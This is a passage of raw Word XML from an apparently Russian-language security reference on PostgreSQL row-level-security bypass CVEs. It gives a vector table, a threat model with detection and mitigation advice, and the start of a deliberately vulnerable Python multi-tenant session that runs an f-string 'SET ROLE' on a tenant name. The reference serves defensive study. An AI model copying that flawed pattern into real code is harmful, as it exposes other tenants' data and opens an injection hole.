                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>только PG 15.0–15.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2D87579B"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FC1C00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.3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CB078F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SET ROLE reset path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EDF7CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10978</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R8)</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48613F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>После SET ROLE plan-cache применяет policy неверной роли</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C76555" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5815A9F5"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389419" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.4</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966529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Optimizer stats обходят ACL/RLS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B3CD2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-8713</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R26)</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D33E25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom operator на planning-этапе sample-ит </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_statistic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> чужих таблиц</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03E283" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 17.5, 16.9, 15.13, 14.18, 13.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="55B3AA4F"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260B32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.5</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886C49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SECURITY DEFINER функции и RLS</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AEEE4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>— (pattern)</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F9129C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SD-функция вызывается под owner — RLS bypass для superuser-owner</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4BB035" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="33B3AAFE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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99765C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(общая)</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5E8335" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.6 SECURITY DEFINER + search_path</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DC75A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</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9A42A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Параллельный класс, разбирается в 3.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FB3F2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB39F9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFE9BCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.17.3 пересекается с 3.13.1 (CVE-2024-10978). Граница: 3.13.1 — получение чужой роли как vector privilege escalation; 3.17.3 — тот же CVE как vector data exfiltration. Cross-ref между ними.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AC04E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельная категория, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>доступ к чужим строкам через 3.17 не означает RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> automatically. RCE требует или superuser-роль (3.13), или COPY TO PROGRAM (3.7.1) — RLS обход даёт только data-access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F44EE4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 Извлечение метаданных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.17.4 (CVE-2025-8713) родственен 3.8.6 (CVE-2024-4317 pg_stats_ext leak) — оба используют optimizer-stats path. Граница: 3.17.4 — bypass конкретной RLS policy через custom operator; 3.8.6 — leak метаданных через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276FEC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересекается с 3.17.5 в том смысле, что SD-функции — common источник RLS-bypass. Граница: 3.16.5 — RCE через identifier-injection; 3.17.5 — data-access через RLS bypass без injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A17F27B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая mitigation: 3.17 — почему обычные права недостаточны, нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE0D48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1070A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Subquery / CTE + plan-cache — CVE-2024-10976 (R9), кэшированный план под старой ролью</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD926D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MERGE не применяет UPDATE/SELECT policy — CVE-2023-39418 (R11), узкое окно PG 15.0–15.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A73372" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SET ROLE reset — CVE-2024-10978 (R8), связан с 3.13.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6D59B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Optimizer stats — CVE-2025-8713 (R26), custom operator на planning-этапе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173E8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER и RLS — classical pattern, без CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7CA90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2F59D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Все шесть векторов 3.17 работают по одной из трёх схем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11857941" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bug в reset/setup пути</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.17.1, 3.17.3) — баг сервера, когда RLS-policy применяется неверной ролью из-за plan-cache + SET ROLE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488977B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Statement type обходит policy applications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.17.2) — MERGE не triggers UPDATE/SELECT policy в окне PG 15.0–15.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1D3A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Side-channel через optimizer/SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.17.4, 3.17.5, 3.13.6) — RLS обходится не напрямую, а через другие mechanisms, которые читают/пишут rows без проверки policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0E43E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Различие важно для детекции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0D1B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Схема 1 — invisible в коде атакующего (только sequence запросов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C999C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Схема 2 — visible в SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE</w:t>
      </w:r>
      <w:r>
        <w:t>-statement в pg_stat_statements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09C750" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Схема 3 — visible в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (custom operator, SD function без FORCE RLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3014CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Защита везде разная:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A6339" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для bug-related (1, 2) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на patched PG-версию</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD5362" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для pattern-related (3) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на critical tables; явный SET ROLE внутри SECURITY DEFINER функций; audit custom operators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD489A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры контекст</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0B3B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RLS — standard PostgreSQL feature, доступная во всех managed providers. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical difference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PG-version policy у providers разная — RDS обычно отстает на 1–2 minor versions от upstream, что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-fix delays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для 3.17.1/3.17.3. Для 3.17.2 (PG 15.0–15.3) — managed providers обычно не были в этом окне (15.0 релиз был в октябре 2022, провайдеры обновлялись пакетно с 15.4+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB3F3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.1 Subquery / CTE + plan-cache (R9, CVE-2024-10976)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5ACC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В PostgreSQL до 17.1/16.5/15.9/14.14/13.17/12.21 (фикс 14.11.2024) RLS-политика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не пересчитывалась при reuse plan-cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в случаях, когда таблица с RLS читается из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subquery, CTE, security invoker view, или SQL-language function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если приложение использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request для multi-tenant изоляции и тот же prepared statement выполняется под несколькими ролями последовательно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plan кэшируется с RLS-фильтром первой роли и применяется для всех последующих ролей</w:t>
      </w:r>
      <w:r>
        <w:t>. Это нарушение RLS-семантики — каждая роль должна видеть только свои rows, но через cached plan атакующий-tenant видит rows другого tenant. CVE-2024-10976 — продолжение цепочки RLS-багов: CVE-2016-2193 (cached plan in plpgsql), CVE-2023-2455 (security definer plus row security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712208F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BEA7D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/db/session.py — multi-tenant session с SET ROLE per-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A391734" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from contextlib import asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BFFA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy.ext.asyncio import async_sessionmaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB9ABD"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78FBFBCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8020C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def tenant_session(tenant_role: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46737C12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Connection с SET ROLE для конкретного tenant"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576BA62A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D27B1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Берёт connection из pool, делает SET ROLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9E9EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text(f"SET ROLE {tenant_role}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FA2CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
